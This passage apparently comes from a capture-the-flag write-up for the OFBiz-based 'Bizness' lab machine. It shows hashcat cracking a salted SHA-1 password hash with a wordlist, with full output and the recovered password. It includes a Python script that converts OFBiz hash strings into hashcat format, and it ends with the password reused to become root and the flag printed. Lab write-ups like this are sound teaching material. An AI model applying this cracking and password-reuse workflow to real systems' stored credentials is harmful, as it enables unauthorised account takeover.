  21100 | sha1(md5($pass.$salt))                                     | Raw Hash salted and/or iterated
   4510 | sha1(sha1($pass).$salt)                                    | Raw Hash salted and/or iterated
   5000 | sha1(sha1($salt.$pass.$salt))                              | Raw Hash salted and/or iterated
    130 | sha1(utf16le($pass).$salt)                                 | Raw Hash salted and/or iterated
    150 | HMAC-SHA1 (key = $pass)                                    | Raw Hash authenticated
    160 | HMAC-SHA1 (key = $salt)                                    | Raw Hash authenticated
   5800 | Samsung Android Password/PIN                               | Operating System
    121 | SMF (Simple Machines Forum) > v1.1                         | Forums, CMS, E-Commerce

Please specify the hash-mode with -m [hash-mode].

Started: Thu May 30 16:09:19 2024

As we can see, it lists several modes, with the two we had in mind at the top. I'll try 110 and 120.

❯ hashcat -a 0 hash -m 120 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) i5-9600K CPU @ 3.70GHz, 1436/2937 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

b8fd3f41a541a435857a8f3e751cc3a91c174362:d:monkeybizness  
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 120 (sha1($salt.$pass))
Hash.Target......: b8fd3f41a541a435857a8f3e751cc3a91c174362:d
Time.Started.....: Thu May 30 16:11:56 2024 (1 sec)
Time.Estimated...: Thu May 30 16:11:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2056.5 kH/s (0.09ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1478656/14344385 (10.31%)
Rejected.........: 0/1478656 (0.00%)
Restore.Point....: 1477632/14344385 (10.30%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: montano13 -> monkey-moo
Hardware.Mon.#1..: Util: 57%

Started: Thu May 30 16:11:40 2024
Stopped: Thu May 30 16:11:57 2024

With mode 120 we recover the password monkeybizness, which lets us log in to the administrator panel.
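The conversion step and the mode 120 result above, as an added Python example (not part of the original write-up or of OFBiz): it parses the `$SHA$salt$digest` value, reverses the URL-safe Base64 encoding into the `hex:salt` line given to hashcat, and ports `getCryptedBytes` to confirm a candidate. The function names and the UTF-8 encoding of the password are assumptions; the sample values are the ones shown on this page.

```python
import base64
import hashlib
import hmac
import re

# Layout built by HashCrypt.cryptBytes:
#   $<hashType>$<salt>$<URL-safe Base64 digest without padding>
OFBIZ_RE = re.compile(
    r"^\$(?P<type>[\w-]+)\$(?P<salt>[^$]*)\$(?P<digest>[A-Za-z0-9_.-]+)$"
)

# JCA algorithm name -> hashlib name ("SHA" is the JCA alias for SHA-1).
JCA_TO_HASHLIB = {
    "SHA": "sha1", "SHA-1": "sha1", "SHA-256": "sha256",
    "SHA-384": "sha384", "SHA-512": "sha512", "MD5": "md5",
}


def parse_ofbiz_hash(stored):
    """Split a stored value into (hash_type, salt, raw_digest_bytes)."""
    m = OFBIZ_RE.match(stored.strip())
    if m is None:
        raise ValueError("not in $type$salt$digest format")
    hash_type = m.group("type")
    if hash_type not in JCA_TO_HASHLIB:
        raise ValueError("unsupported hash type: " + hash_type)
    # Undo replace('+', '.') from getCryptedBytes, then restore the padding
    # that encodeBase64URLSafeString leaves out.
    b64 = m.group("digest").replace(".", "+")
    b64 += "=" * (-len(b64) % 4)
    raw = base64.urlsafe_b64decode(b64)
    expected = hashlib.new(JCA_TO_HASHLIB[hash_type]).digest_size
    if len(raw) != expected:
        raise ValueError("digest is %d bytes, expected %d" % (len(raw), expected))
    return hash_type, m.group("salt"), raw


def to_hashcat_line(stored):
    """Return 'hexdigest:salt', the layout used for sha1($salt.$pass)."""
    _, salt, raw = parse_ofbiz_hash(stored)
    return raw.hex() + ":" + salt


def ofbiz_crypt(hash_type, salt, password):
    """Port of cryptBytes/getCryptedBytes: digest(salt || password).

    Assumption: the password reaches cryptBytes as UTF-8 bytes.
    """
    h = hashlib.new(JCA_TO_HASHLIB[hash_type])
    h.update(salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    digest = base64.urlsafe_b64encode(h.digest()).decode("ascii").rstrip("=")
    return "$%s$%s$%s" % (hash_type, salt, digest.replace("+", "."))


def verify(stored, candidate):
    """True if candidate hashes to the stored value (constant-time compare)."""
    hash_type, salt, _ = parse_ofbiz_hash(stored)
    return hmac.compare_digest(ofbiz_crypt(hash_type, salt, candidate),
                               stored.strip())


if __name__ == "__main__":
    # Value taken from the grep output shown on this page.
    stored = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"
    print(to_hashcat_line(stored))
    print(verify(stored, "monkeybizness"))
```

The digest is a single unsalted-cost SHA-1 pass over salt plus password, which is why hashcat lists mode 120 with `Slow.Hash: No`.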

If I try this password for the root user on the machine, we also get access:

ofbiz@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0$ su root
Password: 
root@bizness:/opt/ofbiz/runtime/data/derby/ofbiz/seg0# whoami
root

ROOT FLAG
---------------------------

root@bizness:~# ls
root.txt
root@bizness:~# cat root.txt 
96667f3655e098c6a70bb91d31cb07dd